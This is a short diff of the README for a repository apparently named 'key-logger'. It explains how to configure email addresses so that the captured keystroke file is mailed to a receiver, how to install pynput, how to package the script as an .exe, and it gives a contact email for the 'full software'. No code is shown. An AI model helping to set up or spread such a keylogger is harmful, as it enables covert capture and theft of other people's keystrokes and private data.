nik-1207/key-logger/README.md

 Just you have to change email id's and path to keylogger generated text file.
 This will send the keylogger generated text file to the recivers email id .
 ## pynput
-do not forget to install pynput package available on https://pypi.org/project/pynput/
+do not forget to install pynput package available above
 ## How to convert python file to .exe
   https://pypi.org/project/auto-py-to-exe/
 # for full software contact nikhil.mohan_cs18@gla.ac.in